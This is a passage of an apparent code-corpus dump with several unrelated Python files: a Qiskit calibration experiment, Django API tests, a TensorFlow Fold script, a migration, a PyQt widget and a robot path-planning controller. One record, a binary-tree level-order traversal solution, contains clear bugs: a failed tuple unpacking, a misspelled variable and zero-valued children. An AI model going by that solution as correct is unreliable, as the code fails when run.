qiskit.providers import Backend\n\nfrom qiskit_experiments.framework import BaseExperiment, Options\nfrom qiskit_experiments.curve_analysis.standard_analysis import ErrorAmplificationAnalysis\nfrom qiskit_experiments.curve_analysis import ParameterRepr\nfrom qiskit_experiments.warnings import qubit_deprecate\n\n\nclass HalfAngle(BaseExperiment):\n r\"\"\"An experiment class to measure the amount by which sx and x are not parallel.\n\n # section: overview\n\n This experiment runs circuits that repeat blocks of :code:`sx - sx - y` gates\n inserted in a Ramsey type experiment, i.e. the full gate sequence is thus\n :code:`Ry(π/2) - [sx - sx - y] ^ n - sx` where :code:`n` is varied.\n\n .. parsed-literal::\n\n ┌─────────┐┌────┐┌────┐┌───┐ ┌────┐┌────┐┌───┐┌────┐ ░ ┌─┐\n q_0: ┤ Ry(π/2) ├┤ sx ├┤ sx ├┤ y ├...┤ sx ├┤ sx ├┤ y ├┤ sx ├─░─┤M├\n └─────────┘└────┘└────┘└───┘ └────┘└────┘└───┘└────┘ ░ └╥┘\n meas: 1/════════════════════════════...═══════════════════════════╩═\n 0\n\n This sequence measures angle errors where the axis of the :code:`sx` and :code:`x`\n rotation are not parallel. A similar experiment is described in Ref.~[1] where the\n gate sequence :code:`x - y` is repeated to amplify errors caused by non-orthogonal\n :code:`x` and :code:`y` rotation axes. Such errors can occur due to phase errors.\n For example, the non-linearities in the mixer's skew for :math:`\\pi/2` pulses may\n be different from the :math:`\\pi` pulse.\n\n # section: analysis_ref\n :class:`.ErrorAmplificationAnalysis`\n\n # section: reference\n .. ref_arxiv:: 1 1504.06597\n \"\"\"\n\n @classmethod\n def _default_experiment_options(cls) -> Options:\n r\"\"\"Default values for the half angle experiment.\n\n Experiment Options:\n repetitions (List[int]): A list of the number of times that the gate\n sequence :code:`[sx sx y]` is repeated.\n \"\"\"\n options = super()._default_experiment_options()\n options.repetitions = list(range(15))\n return options\n\n @classmethod\n def _default_transpile_options(cls) -> Options:\n \"\"\"Default transpile options.\n\n The basis gates option should not be changed since it will affect the gates and\n the pulses that are run on the hardware.\n \"\"\"\n options = super()._default_transpile_options()\n options.basis_gates = [\"sx\", \"rz\", \"y\"]\n options.inst_map = None\n return options\n\n @qubit_deprecate()\n def __init__(self, physical_qubits: Sequence[int], backend: Optional[Backend] = None):\n \"\"\"Setup a half angle experiment on the given qubit.\n\n Args:\n physical_qubits: List containing the qubits on which to run the\n fine amplitude calibration experiment.\n backend: Optional, the backend to run the experiment on.\n \"\"\"\n analysis = ErrorAmplificationAnalysis()\n\n default_bounds = analysis.options.bounds\n default_bounds.update({\"d_theta\": (-np.pi / 2, np.pi / 2)})\n\n analysis.set_options(\n fixed_parameters={\n \"angle_per_gate\": np.pi,\n \"phase_offset\": -np.pi / 2,\n \"amp\": 1.0,\n },\n result_parameters=[ParameterRepr(\"d_theta\", \"d_hac\", \"rad\")],\n normalization=True,\n bounds=default_bounds,\n )\n\n super().__init__(physical_qubits, analysis=analysis, backend=backend)\n\n @staticmethod\n def _pre_circuit() -> QuantumCircuit:\n \"\"\"Return the preparation circuit for the experiment.\"\"\"\n return QuantumCircuit(1)\n\n def circuits(self) -> List[QuantumCircuit]:\n \"\"\"Create the circuits for the half angle calibration experiment.\"\"\"\n\n circuits = []\n\n for repetition in self.experiment_options.repetitions:\n circuit = self._pre_circuit()\n\n # First ry gate\n circuit.rz(np.pi / 2, 0)\n circuit.sx(0)\n circuit.rz(-np.pi / 2, 0)\n\n # Error amplifying sequence\n for _ in range(repetition):\n circuit.sx(0)\n circuit.sx(0)\n circuit.y(0)\n\n circuit.sx(0)\n circuit.measure_all()\n\n circuit.metadata = {\n \"experiment_type\": self._type,\n \"qubits\": self.physical_qubits,\n \"xval\": repetition,\n \"unit\": \"repetition number\",\n }\n\n circuits.append(circuit)\n\n return circuits\n\n def _metadata(self):\n metadata = super()._metadata()\n # Store measurement level and meas return if they have been\n # set for the experiment\n for run_opt in [\"meas_level\", \"meas_return\"]:\n if hasattr(self.run_options, run_opt):\n metadata[run_opt] = getattr(self.run_options, run_opt)\n return metadata\n","sub_path":"qiskit_experiments/library/characterization/half_angle.py","file_name":"half_angle.py","file_ext":"py","file_size_in_byte":6037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"245701982","text":"## Reference\n# http://www.lintcode.com/en/problem/binary-tree-level-order-traversal-ii/\n# https://leetcode.com/problems/binary-tree-level-order-traversal-ii/#/description\n\n\n## Tags - Medium\n# Binary Tree; Breadth First Search; Binary Tree Traversal;\n# Queue\n\n\n## Description\n# Given a binary tree, return the bottom-up level order traversal of its nodes' values.\n# (ie. from left to right, level by level from leaf to root)\n\n\n## Analysis\n# last problem is top-down; this one is bottom-up.\n# input - the root of the binary tree\n# output - the node values list from leaf to root\n# The first/direct solution is the dfs max depth one, as which is similar to the previous problem\n# and only need to reverse the max depth number, but how could we know the max depth\n# so actually, we can figure out the solution according to previous solution,\n# and then reverse the result. Any better solution? \n\n# Time - O(N); Space - O(N) as using extra queue or extra tempstack for reverse\n\n\n## Solution\n# binary tree definition\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = 0, 0\n\nclass Solution:\n # DFS for BFS\n def dfs(self, root, depth, max_depth):\n if not root or depth > max_depth:\n return []\n # base case\n if depth == max_depth:\n return [root.val]\n left = self.dfs(root.left, depth+1, max_depth)\n right = self.dfs(root.right, depth+1, max_depth)\n return left+right\n\n # while + DFS\n def levelOrderBottom2(self, root):\n if not root:\n return []\n result = []\n depth, max_depth = 0\n while True:\n level = self.dfs(root, depth, max_depth)\n if not level:\n break\n result.append(level)\n max_depth += 1\n return reversed(result)\n\n\n # One queue BFS + reverse\n def levelOrderBottom1(self, root):\n if not root:\n return []\n result = []\n from collections import deque\n q = deque([root])\n while q:\n level = []\n qlen = len(q)\n for i in xrange(qlen):\n current = q.popleft()\n leve.append(current.val)\n if current.left:\n q.append(current.left)\n if current.right:\n q.append(current.right)\n result.append(level)\n result.reverse()\n return result\n\n\n","sub_path":"data_structures/tree/binary_tree/binarytree_levelorder_traversal2.py","file_name":"binarytree_levelorder_traversal2.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"505927622","text":"# stdlib\nimport json\nfrom urllib.parse import urlencode\n# third party\nfrom brasil_municipios.models import Municipio\nfrom django.contrib.gis.geos import Point, LinearRing, Polygon, MultiPolygon\nfrom django.core.urlresolvers import reverse\nfrom django.test import Client, TestCase\nfrom django.utils.text import slugify\n# project\nfrom spot.models import Spot\n\n\ncities_test_data = {\n 'cities': [\n {\n 'name': 'City B', 'state': 'ST', 'geocode': '2',\n 'geometry': MultiPolygon(Polygon(LinearRing(\n Point(3, 7), Point(9, 7), Point(9, 1),\n Point(3, 1), Point(3, 7),\n )))\n },\n {\n 'name': 'City A', 'state': 'ST', 'geocode': '1',\n 'geometry': MultiPolygon(Polygon(LinearRing(\n Point(-6, 2), Point(1, 2), Point(1, -6),\n Point(-6, -6), Point(-6, 2),\n )))\n },\n {\n 'name': 'City C', 'state': 'ST', 'geocode': '3', # No spots here\n 'geometry': MultiPolygon(Polygon(LinearRing(\n Point(4, -3), Point(7, -3), Point(7, -5),\n Point(4, -5), Point(4, -3),\n )))\n },\n ],\n 'spots': [\n {'name': 'A', 'coords': Point(-5, 1)}, # City A\n {'name': 'B', 'coords': Point(-4, -4)}, # City A\n {'name': 'C', 'coords': Point(-2, -1)}, # City A\n {'name': 'D', 'coords': Point(4, 2)}, # City B\n {'name': 'E', 'coords': Point(6, 6)}, # City B\n {'name': 'F', 'coords': Point(-6, 8)}, # No city\n {'name': 'G', 'coords': Point(-3, 8)}, # No city\n {'name': 'H', 'coords': Point(-2, 4)}, # No city\n {'name': 'I', 'coords': Point(3, -2)}, # No city\n {'name': 'J', 'coords': Point(9, -6)}, # No city\n ]\n}\n\n\nclass CitiesTestCase(TestCase):\n\n def setUp(self):\n self.cities = [\n Municipio.objects.create(**city_data)\n for city_data in cities_test_data['cities']\n ]\n\n for spot_data in cities_test_data['spots']:\n spot_data['slug'] = slugify(spot_data['name'])\n Spot.objects.create(**spot_data)\n\n self.client = Client(SERVER_NAME='test-server.com')\n self.server_url = 'http://test-server.com'\n self.spots_url = reverse('spots', kwargs={'api_version': 1})\n self.cities_url = reverse('cities', kwargs={'api_version': 1})\n\n def test_list(self):\n response = self.client.get(self.cities_url)\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content.decode('utf-8'))\n\n # City C has no spots, thus shouldn't be returned\n self.assertEqual(len(content), 2)\n\n # content[0] = City A (order by city name by default)\n city_id = self.cities[1].pk\n self.assertEqual(\n content[0],\n {\n 'id': city_id,\n 'name': 'City A',\n 'state': 'ST',\n 'spotsCount': 3,\n 'spotsUrl': ''.join([self.server_url,\n self.spots_url,\n '?',\n urlencode({'city': city_id})])\n }\n )\n # content[1] = City B\n city_id = self.cities[0].pk\n self.assertEqual(content[1], {\n 'id': city_id,\n 'name': 'City B',\n 'state': 'ST',\n 'spotsCount': 2,\n 'spotsUrl': ''.join([self.server_url,\n self.spots_url,\n '?',\n urlencode({'city': city_id})])\n })\n\n def test_sort_by_name(self):\n #\n # ASC\n #\n url = self.cities_url + '?' + urlencode({'sort': 'name'})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content.decode('utf-8'))\n self.assertEqual(content[0]['name'], 'City A')\n self.assertEqual(content[1]['name'], 'City B')\n #\n # DESC\n #\n url = self.cities_url + '?' + urlencode({'sort': '-name'})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content.decode('utf-8'))\n self.assertEqual(content[0]['name'], 'City B')\n self.assertEqual(content[1]['name'], 'City A')\n\n def test_sort_by_count(self):\n #\n # ASC\n #\n url = self.cities_url + '?' + urlencode({'sort': 'spots_count'})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content.decode('utf-8'))\n self.assertEqual(content[0]['name'], 'City B') # 2 spots\n self.assertEqual(content[1]['name'], 'City A') # 3 spots\n #\n # DESC\n #\n url = self.cities_url + '?' + urlencode({'sort': '-spots_count'})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content.decode('utf-8'))\n self.assertEqual(content[0]['name'], 'City A') # 3 spots\n self.assertEqual(content[1]['name'], 'City B') # 2 spots\n","sub_path":"city/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"41629058","text":"import pandas as pd\n\n\nfile_book = r\"C:\\test\\train\\BOOK_AUTHORS.CSV\"\nfile_site = r\"C:\\test\\train\\SITE_DATA.CSV\"\ndf_book = pd.read_csv(file_book)\ndf_site = pd.read_csv(file_site)\n\ndf = pd.merge(df_site, df_book, on='title', how='left').drop_duplicates()\n\ndf.to_csv(r'C:\\test\\train\\NEW_MEN.csv', index=False)\n","sub_path":"train/test/new_mentioned.py","file_name":"new_mentioned.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"205112103","text":"from __future__ import print_function\nimport tensorflow as tf\nimport tensorflow_fold as td\nimport model_fold\nimport preprocessing\nimport spacy\nimport pickle\nimport pprint\nimport os\nimport sequence_node_sequence_pb2\nimport sequence_node_candidates_pb2\nimport numpy as np\n\n# Replication flags:\ntf.flags.DEFINE_string('logdir', '/home/arne/tmp/tf/log',\n 'Directory in which to write event logs.')\ntf.flags.DEFINE_string('model_path', '/home/arne/tmp/tf/log/model.ckpt-976',\n 'model file')\ntf.flags.DEFINE_string('data_mapping_path', 'data/nlp/spacy/dict.mapping',\n 'model file')\ntf.flags.DEFINE_string('train_dict_path', 'data/nlp/spacy/dict.vecs',\n 'Numpy array which is used to initialize the embedding vectors.')\ntf.flags.DEFINE_string('master', '',\n 'Tensorflow master to use.')\ntf.flags.DEFINE_integer('task', 0,\n 'Task ID of the replica running the training.')\ntf.flags.DEFINE_integer('ps_tasks', 0,\n 'Number of PS tasks in the job.')\nFLAGS = tf.flags.FLAGS\n\nPROTO_PACKAGE_NAME = 'recursive_dependency_embedding'\nPROTO_CLASS = 'SequenceNode'\n\ndef parse_iterator(sequences, parser, sentence_processor, data_maps):\n #pp = pprint.PrettyPrinter(indent=2)\n for (s, idx_correct) in sequences:\n seq_tree_seq = sequence_node_sequence_pb2.SequenceNodeSequence()\n seq_tree_seq.idx_correct = idx_correct\n for s2 in s:\n new_tree = seq_tree_seq.trees.add()\n preprocessing.build_sequence_tree_from_str(s2, sentence_processor, parser, data_maps, seq_tree=new_tree)\n #pp.pprint(seq_tree_seq)\n yield td.proto_tools.serialized_message_to_tree('recursive_dependency_embedding.SequenceNodeSequence', seq_tree_seq.SerializeToString())\n\n\ndef parse_iterator_candidates(sequences, parser, sentence_processor, data_maps):\n pp = pprint.PrettyPrinter(indent=2)\n for s in sequences:\n seq_data, seq_parents = preprocessing.read_data(preprocessing.identity_reader, sentence_processor, parser, data_maps,\n args={'content': s}, expand_dict=False)\n children, roots = preprocessing.children_and_roots(seq_parents)\n\n # dummy position\n insert_idx = 5\n candidate_indices = [2, 8]\n seq_tree_cand = preprocessing.build_sequence_tree_with_candidates(seq_data, children, roots[0], insert_idx, candidate_indices)\n pp.pprint(seq_tree_cand)\n yield td.proto_tools.serialized_message_to_tree('recursive_dependency_embedding.SequenceNodeCandidates', seq_tree_cand.SerializeToString())\n\nlex_size = 1300000\nembedding_dim = 300\n\ndef main(unused_argv):\n print('load spacy ...')\n nlp = spacy.load('en')\n nlp.pipeline = [nlp.tagger, nlp.parser]\n print('load data_mapping from: '+FLAGS.data_mapping_path + ' ...')\n data_maps = pickle.load(open(FLAGS.data_mapping_path, \"rb\"))\n\n # DEBUG EXCLUDE\n #print('load embeddings from: ' + FLAGS.train_dict_path + ' ...')\n #embeddings_np = np.load(FLAGS.train_dict_path)\n\n #embedding_dim = embeddings_np.shape[1]\n #lex_size = 1300000\n lex_size = 100000\n #assert lex_size >= embeddings_np.shape[0], 'len(embeddings) > lex_size. Can not cut the lexicon!'\n #embeddings_padded = np.lib.pad(embeddings_np, ((0, lex_size - embeddings_np.shape[0]), (0, 0)), 'mean')\n\n with tf.Graph().as_default():\n with tf.device(tf.train.replica_device_setter(FLAGS.ps_tasks)):\n embed_w = tf.Variable(tf.constant(0.0, shape=[lex_size, embedding_dim]), trainable=True, name='embeddings')\n embedding_placeholder = tf.placeholder(tf.float32, [lex_size, embedding_dim])\n embedding_init = embed_w.assign(embedding_placeholder)\n\n trainer = model_fold.SequenceTreeEmbeddingWithCandidates(embed_w)\n\n softmax_correct = trainer.softmax_correct\n loss = trainer.loss\n train_op = trainer.train_op\n global_step = trainer.global_step\n\n # collect important variables\n scoring_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=model_fold.DEFAULT_SCOPE_SCORING)\n\n # Add ops to save and restore all the variables.\n saver = tf.train.Saver()\n\n # Later, launch the model, use the saver to restore variables from disk, and\n # do some work with the model.\n with tf.Session() as sess:\n\n # DEBUG EXCLUDE\n # exclude embedding, will be initialized afterwards\n #init_vars = [v for v in tf.global_variables() if v != embed_w]\n #tf.variables_initializer(init_vars).run()\n #print('init embeddings with external vectors...')\n #sess.run(embedding_init, feed_dict={embedding_placeholder: embeddings_padded})\n tf.global_variables_initializer().run()\n\n #tf.variables_initializer(tf.global_variables()).run()\n\n # Restore variables from disk.\n #print('restore model ...')\n #saver.restore(sess, FLAGS.model_path)\n # Do some work with the model\n print('parse input ...')\n #batch = list(parse_iterator([(['Hallo.', 'Hallo!', 'Hallo?', 'Hallo'], 0), (['Hallo.', 'Hallo!', 'Hallo?', 'Hallo'], 0)],\n # nlp, preprocessing.process_sentence3, data_maps))\n batch = list(parse_iterator_candidates(\n [u'London is a big city in the United Kingdom. I like this.'],\n nlp, preprocessing.process_sentence2, data_maps))\n\n #batch = list(parse_iterator(\n # [([u'Hallo.'], 0)],\n # nlp, preprocessing.process_sentence3, data_maps))\n\n fdict = trainer.build_feed_dict(batch)\n print('calculate tree embeddings ...')\n #_, step, loss_v = sess.run([train_op, global_step, loss], feed_dict=fdict)\n _, step, loss_v, smax_correct = sess.run([train_op, global_step, loss, softmax_correct], feed_dict=fdict)\n #print(loss_v)\n print('step=%d: loss=%f' % (step, loss_v))\n print(smax_correct)\n\n\nif __name__ == '__main__':\n ROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n td.proto_tools.map_proto_source_tree_path('', ROOT_DIR)\n td.proto_tools.import_proto_file('sequence_node.proto')\n td.proto_tools.import_proto_file('sequence_node_sequence.proto')\n td.proto_tools.import_proto_file('sequence_node_candidates.proto')\n tf.app.run()\n","sub_path":"train_fold_nce_dummy.py","file_name":"train_fold_nce_dummy.py","file_ext":"py","file_size_in_byte":6656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"88866432","text":"\"\"\"empty message\n\nRevision ID: 0e077408e5ad\nRevises: f3e03b3ea4ad\nCreate Date: 2018-02-25 16:03:16.853738\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy_utils.types\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '0e077408e5ad'\ndown_revision = 'f3e03b3ea4ad'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('direct_keyword', sa.Column('AuctionBids', sa.JSON(none_as_null=True), nullable=True))\n op.add_column('direct_keyword', sa.Column('date_bids_updated', sqlalchemy_utils.types.arrow.ArrowType(timezone=True), nullable=True))\n op.drop_column('direct_keyword', 'date_updated')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('direct_keyword', sa.Column('date_updated', postgresql.TIMESTAMP(timezone=True), autoincrement=False, nullable=False))\n op.drop_column('direct_keyword', 'date_bids_updated')\n op.drop_column('direct_keyword', 'AuctionBids')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/0e077408e5ad_.py","file_name":"0e077408e5ad_.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"254949146","text":"#!/usr/bin/env python3\nimport sys\nimport os\nfrom PyQt5 import uic\nfrom PyQt5.QtGui import QIcon,QPixmap,QCursor\nfrom PyQt5.QtCore import Qt,QEvent,QPoint,QSize\nfrom PyQt5.QtWidgets import QLabel, QWidget,QVBoxLayout,QHBoxLayout,QCheckBox,QSizePolicy,QToolButton,QMenu,QToolTip\n\n\nfrom . import waitingSpinner\n\nfrom . import settings\nimport gettext\ngettext.textdomain(settings.TEXT_DOMAIN)\n_ = gettext.gettext\n\n\nclass InstallersBox(QWidget):\n\tdef __init__(self):\n\t\tsuper(InstallersBox, self).__init__() # Call the inherited classes __init__ method\n\t\t\n\t\tself.core=Core.Core.get_core()\n\t\tui_file=self.core.rsrc_dir+\"installersBox.ui\"\n\t\tuic.loadUi(ui_file, self) # Load the .ui fil\n\t\tself.boxInstallers=self.findChild(QVBoxLayout,'installersBox')\n\t\tself.boxInstallers.setAlignment(Qt.AlignTop)\n\t\tself.scrollArea=self.findChild(QWidget,'scrollAreaWidgetContents')\n\t\tself.scrollArea.setStyleSheet(\"background-color:white\")\n\t\tself.box_selected=[]\n\t\tself.flavours_selected=[]\n\t\n\t#def __init__\n\n\tdef drawInstallerList(self):\n\t\t\n\t\tself.total_flavours=0\n\t\tself.total_flavours=self.core.flavourSelectorManager.total_flavours\n\t\t'''\n\t\tfor item in self.core.flavourSelectorManager.flavour_list:\n\t\t\tif self.core.flavourSelectorManager.flavour_list[item][\"show\"]:\n\t\t\t\tself.total_flavours+=1\n\t\t'''\n\t\tself.count=0\n\t\tfor item in self.core.flavourSelectorManager.flavour_list:\n\t\t\talternative_type=\"\"\n\t\t\talternative_list=\"\"\n\t\t\tif self.core.flavourSelectorManager.flavour_list[item][\"show\"]:\n\t\t\t\tself.count+=1\n\t\t\t\tif \"client\" in self.core.flavourSelectorManager.flavour_list[item][\"pkg\"]:\n\t\t\t\t\tif len(self.core.flavourSelectorManager.client_desktop_alternatives)>0:\n\t\t\t\t\t\talternative_type=\"client-desktop\"\n\t\t\t\t\t\talternative_list=self.core.flavourSelectorManager.client_desktop_alternatives\n\t\t\t\t\telif len(self.core.flavourSelectorManager.client_lite_alternatives)>0:\n\t\t\t\t\t\talternative_type=\"client-lite\"\n\t\t\t\t\t\talternative_list=self.core.flavourSelectorManager.client_lite_alternatives\n\t\t\t\tif \"server\" in self.core.flavourSelectorManager.flavour_list[item][\"pkg\"]:\n\t\t\t\t\tif len(self.core.flavourSelectorManager.server_alternatives)>0:\n\t\t\t\t\t\talternative_type=\"server\"\n\t\t\t\t\t\talternative_list=self.core.flavourSelectorManager.server_alternatives\n\t\t\t\tif \"desktop\" in self.core.flavourSelectorManager.flavour_list[item][\"pkg\"]:\n\t\t\t\t\tif len(self.core.flavourSelectorManager.desktop_alternatives)>0:\n\t\t\t\t\t\talternative_type=\"desktop\"\n\t\t\t\t\t\talternative_list=self.core.flavourSelectorManager.desktop_alternatives\n\n\n\t\t\t\tself.newInstallerBox(self.core.flavourSelectorManager.flavour_list[item],item,alternative_type,alternative_list)\n\t\t\t\n\t#def drawInstallerList\n\n\tdef newInstallerBox(self,item,order,alternative_type,alternative_list):\n\n\t\thbox=QHBoxLayout()\n\t\thbox.setContentsMargins(0,0,0,0)\n\t\thbox.setSpacing(0)\n\t\t\n\t\tcheckbox=QCheckBox()\n\t\tcheckbox.setTristate(False)\n\t\tcheckbox.stateChanged.connect(self.changeState)\n\t\t\n\t\ttitle=self.getTitle(item[\"pkg\"])\n\t\tcheckbox.setStyleSheet(\"padding:10px;height:80px\")\n\t\tcheckbox.item=item\n\t\tcheckbox.pkg=item[\"pkg\"]\n\t\tcheckbox.alternative_type=alternative_type\n\t\tcheckbox.setSizePolicy(QSizePolicy(QSizePolicy.Fixed,QSizePolicy.Fixed));\n\t\thbox.addWidget(checkbox)\n\t\t\n\t\ticon=QLabel()\n\t\tpixmap=QPixmap(item[\"banner\"])\n\t\ticon.setPixmap(pixmap)\n\t\ticon.setAlignment(Qt.AlignCenter|Qt.AlignVCenter)\n\t\ticon.setMinimumSize(75,75)\n\t\ticon.setMaximumSize(75,75)\n\t\ticon.item=item\n\t\thbox.addWidget(icon)\n\t\t\n\t\tname=QLabel()\n\t\tname.setText(item[\"name\"]+\": \"+title)\n\t\tname.setAlignment(Qt.AlignLeft|Qt.AlignVCenter)\n\t\tif self.count 0 and k[2] > 0:\n kk = \"ltup\"\n # print(kk)\n elif k[0] > 0 and k[3] > 0:\n kk = \"ltdn\"\n # print(kk)\n elif k[1] > 0 and k[2] > 0:\n kk = \"rtup\"\n # print(kk)\n elif k[1] > 0 and k[3] > 0:\n kk = \"rtdn\"\n # print(kk)\n elif k[2] > 0:\n kk = \"up\"\n # print(kk)\n elif k[3] > 0:\n kk = \"dn\"\n\n return kk\n\n\ncdi = []\n\"\"\"\nFunction Name : compass()\nInput: nm-next move\nOutput: corrected direction\nPurpose: this functions take the next move from the stepcount1 function and then decides the direction\n according to the previous move and the alignment of the robot.\n\"\"\"\n\n\ndef compass(nm):\n\n if len(premove) != 0:\n pm = premove[-1]\n if pm == \"up\":\n if nm == \"dn\":\n return \"rt2up\"\n else:\n return nm\n elif pm == \"dn\":\n if nm == \"ltdn\":\n return \"rtup\"\n elif nm == \"rtdn\":\n return \"ltup\"\n elif nm == \"up\":\n return \"rt2up\"\n elif pm == \"ltdn\":\n if nm == \"ltup\":\n return \"rtup\"\n elif nm == \"dn\":\n return \"ltup\"\n elif nm == \"rtup\":\n return \"lt2up\"\n elif pm == \"rtdn\":\n if nm == \"dn\":\n return \"rtup\"\n elif nm == \"rtup\":\n return \"ltup\"\n elif nm == \"ltup\":\n return \"rt2up\"\n elif pm == \"rtup\":\n if nm == \"up\":\n return \"ltup\"\n elif nm == \"rtdn\":\n return \"rtup\"\n elif nm == \"ltdn\":\n return \"rt2up\"\n elif pm == \"ltup\":\n if nm == \"up\":\n return \"rtup\"\n elif nm == \"ltdn\":\n return \"ltup\"\n elif nm == \"rtdn\":\n return \"lt2up\"\n\n else:\n if nm == \"ltdn\":\n return \"ltup\"\n elif nm == \"rtdp\":\n return \"rtup\"\n else:\n\n return nm\n\n\ndii = []\n\"\"\"\nFunction Name : getdirections()\nInput: None\nOutput: None\nPurpose:After getting the finals nodes of the path , we need to get the directions for movement\n of the robot. This function uses the lsit DII containg all the nodes that will come in \n the path and it will generate a list which will contain the movement directions \n according to the areana. It then Uses the function COMPASS to get the directions \n according to the current configuration of the robot and put them in a list CDI. \n\"\"\"\n\n\ndef getdirections():\n for x in range(len(allmoves) - 1):\n dii.append(\n stepcount1(\n allmoves[x][0], allmoves[x][1], allmoves[x + 1][0], allmoves[x + 1][1]\n )\n )\n for y in range(len(dii)):\n cdi.append(compass(dii[y]))\n premove.append(dii[y])\n\n\npebble = []\nwater = []\n\n\"\"\"\nmapp\nwe have assumed the arena to be a X-Y cordinate but we have two starts and hence if the starting position changes \neverything everything will change. we've marked the axes from start 2. if the robot has to start from start 1 this will help it.\n\"\"\"\nmapp = {\n 1: 17,\n 2: 18,\n 3: 12,\n 4: 16,\n 5: 19,\n 6: 13,\n 7: 7,\n 8: 11,\n 9: 15,\n 10: 14,\n 11: 8,\n 12: 3,\n 13: 6,\n 14: 10,\n 15: 9,\n 16: 4,\n 17: 1,\n 18: 2,\n 19: 5,\n}\n\"\"\" \nFunction Name : savepositions1()\nInput: None\nOutput: currentposition- starting position of the bot .\nPurpose: this function extracts the features from the given configuration from E-yantra\n and makes it more accesible by preparing a list of pebbles and water. \n that contains the information about the pickup zone and the pitcher zone.\n \n\"\"\"\n\n\ndef savepositions1():\n global allpositions\n for points in start:\n if points[0] == Robot_start:\n ci = points[1][0]\n cj = points[1][1]\n for i in arena_config:\n typ = arena_config[i][0]\n comb = arena_config[i][1]\n pos = arena_config[i][2]\n if ci == 12 and cj == 6:\n comb = mapp[comb]\n for data in dests:\n if data[0] == comb and data[1] == pos:\n cord = data[2]\n if typ == \"Pebble\":\n pebble.append([typ, cord, pos, i, 1])\n elif typ == \"Water Pitcher\":\n water.append([typ, cord, pos, i, 0])\n if ci == 12 and cj == 6:\n ci = 1\n currentposition = [ci, cj]\n\n return currentposition\n\n\n\"\"\"\nFunction Name : finalmove()\nInput: start:- currentposition obtained from the saveposition function.\nOutput: None.\nPurpose: this function send command to the robot using the bhagna function that uses run1() and then the\n robot moves. This does all the pick up managment in proper way. find the nearest pickup zone\n and moves to that from the current location. After putting one pebble into pitcher, it again searches\n for the nearest pebble and then goes there to pickup . Along with the complete movement traversal \n it also does the mad and the rvrt thing along with the buzzer for 5 seconds at last.\n \n\"\"\"\n\n\ndef finalmove(start):\n global pebble\n nearest = 999\n for lab, points in enumerate(pebble):\n if points[-1] > 0:\n if (\n stepcount(start[0], start[1], points[1][1][0], points[1][1][1])[-1]\n < nearest\n and m[points[1][1][0]][points[1][1][1]] != 0\n ):\n nearest = stepcount(\n start[0], start[1], points[1][1][0], points[1][1][1]\n )[-1]\n dest = points[1][1]\n minu = lab\n if (\n stepcount(start[0], start[1], points[1][0][0], points[1][0][1])[-1]\n < nearest\n and m[points[1][0][0]][points[1][0][1]] != 0\n ):\n nearest = stepcount(\n start[0], start[1], points[1][0][0], points[1][0][1]\n )[-1]\n dest = points[1][0]\n minu = lab\n\n print(pebble)\n # time.sleep(1)\n print(start, dest)\n bhagna(start[0], start[1], dest[0], dest[1])\n pebble[minu][-1] -= 1\n ser.write(\"m\".encode())\n mad(pebble[minu][2], premove)\n rvrt(predir)\n\n print(pebble)\n i = 0\n while True:\n if i % 2 == 0:\n curr = dest\n if (\n stepcount(curr[0], curr[1], water[0][1][0][0], water[0][1][0][1])[-1]\n < stepcount(curr[0], curr[1], water[0][1][1][0], water[0][1][1][1])[-1]\n ):\n dest = water[0][1][0]\n else:\n dest = water[0][1][1]\n config = water[0][2]\n bhagna(curr[0], curr[1], dest[0], dest[1])\n water[0][-1] += 1\n print(\"bole\")\n else:\n curr = dest\n nearest = 999\n for lab, points in enumerate(pebble):\n if points[-1] > 0:\n if (\n stepcount(curr[0], curr[1], points[1][1][0], points[1][1][1])[\n -1\n ]\n < nearest\n and m[points[1][1][0]][points[1][1][1]] != 0\n ):\n nearest = stepcount(\n curr[0], curr[1], points[1][1][0], points[1][1][1]\n )[-1]\n dest = points[1][1]\n minu = lab\n if (\n stepcount(curr[0], curr[1], points[1][0][0], points[1][0][1])[\n -1\n ]\n < nearest\n and m[points[1][0][0]][points[1][0][1]] != 0\n ):\n nearest = stepcount(\n curr[0], curr[1], points[1][0][0], points[1][0][1]\n )[-1]\n dest = points[1][0]\n minu = lab\n\n bhagna(curr[0], curr[1], dest[0], dest[1])\n pebble[minu][-1] -= 1\n config = pebble[minu][2]\n # time.sleep(0.5)\n print(curr, dest)\n if i % 2 != 0:\n pass\n ser.write(\"m\".encode())\n mad(config, premove)\n if i % 2 == 0:\n pass\n ser.write(\"o\".encode())\n\n rvrt(predir)\n print(pebble)\n i += 1\n flag = False\n for points in pebble:\n if points[-1] > 0:\n flag = True\n\n if flag == False and i % 2 != 0:\n break\n time.sleep(1)\n ser.write(\"b\".encode())\n time.sleep(5)\n ser.write(\"n\".encode())\n\n\n\"\"\" \nFunction Name : run1()\nInput: None\nOutput: None\nPurpose: Accordint to the directions in the cdi it sends command to the robot. run1 uses 